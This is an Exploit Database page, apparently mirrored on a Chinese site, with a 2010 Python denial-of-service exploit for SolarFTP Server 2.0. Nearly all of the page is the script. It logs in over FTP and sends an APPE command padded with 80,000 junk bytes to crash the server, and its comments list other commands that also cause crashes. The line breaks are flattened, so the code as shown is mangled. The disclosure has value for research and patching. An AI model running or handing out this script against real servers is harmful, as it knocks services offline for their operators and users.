Solar FTP Server 2.0 – Multiple Denial of Service Vulnerabilities

• Exploit Database
• 109 阅读

• 作者： modpr0be
  日期： 2010-12-16
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/15750/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69

  #!/usr/bin/python   # Exploit Title: SolarFTP 2.0 Multiple Commands Denial of Service Vulnerability # Date: 12/17/2010 # Author: modpr0be # Software Link: http://www.solarftp.com/files/solarftps-setup.exe # Vulnerable version: 2.0 # Tested on: Windows XP SP2, Windows XP SP3 # CVE : N/A # # ====================================================================== #___ _ _______ __ # ____/ (_)___ _(_) /_____ _/ / ________/ /_(_)___/ /_______ _ #/ __/ / __ <code>/ / __/ __ </code>/ / / _ \/ ___/ __ \/ / __/ __ \/ __ `/ # / /_/ / / /_/ / / /_/ /_/ / / /__/ /__/ / / / / /_/ / / / / /_/ / # \__,_/_/\__, /_/\__/\__,_/_/\___/\___/_/ /_/_/\__,_/_/ /_/\__,_/ #/____/http://www.digital-echidna.org # ====================================================================== # # Greetz: # say hello to all digital-echidna org crew: # otoy, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix # special thx to amalia (^^), oebaj, offsec, exploit-db, corelan team # #### Software description: # Solar FTP Server is a handy and easy to use personal FTP server with # features like virtual directories, simple and intuitive user interface, # real-time activity monitoring and management. # #### Exploit information: # SolarFTP 2.0 will suddenly stop (crash) while these commands were sent: # APPE, GET, PUT, NLST, and MDTM # Sending USER with junk also crashing the Admin Configuration but not the service. # Stack contains our junk in random. Both EIP and SEH were not overwritten. # #### Other information: # 12/10/2010 - vendor contacted # 12/17/2010 - no response, advisory released   import socket, sys s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)   junk = "\x41" * 80000   def banner(): print "\nSolarFTP 2.0 Multiple Commands Denial of Service Vulnerability." print "By: modpr0be (modpr0be[at]digital-echidna[dot]org)\n"   if len(sys.argv)!=4: banner() print "Usage: %s <ip> <user> <pass>\n" %sys.argv[0] sys.exit(0)   try: s.connect((sys.argv[1], 21)) except: print "Can\&apos;t connect to server!\n" sys.exit(0) s.recv(1024) s.send(&apos;USER &apos;+sys.argv[2]+&apos;\r\n&apos;) s.recv(1024) s.send(&apos;PASS &apos;+sys.argv[3]+&apos;\r\n&apos;) s.recv(1024) s.send(&apos;APPE &apos;+junk+&apos;\r\n&apos;) s.recv(1024) s.close()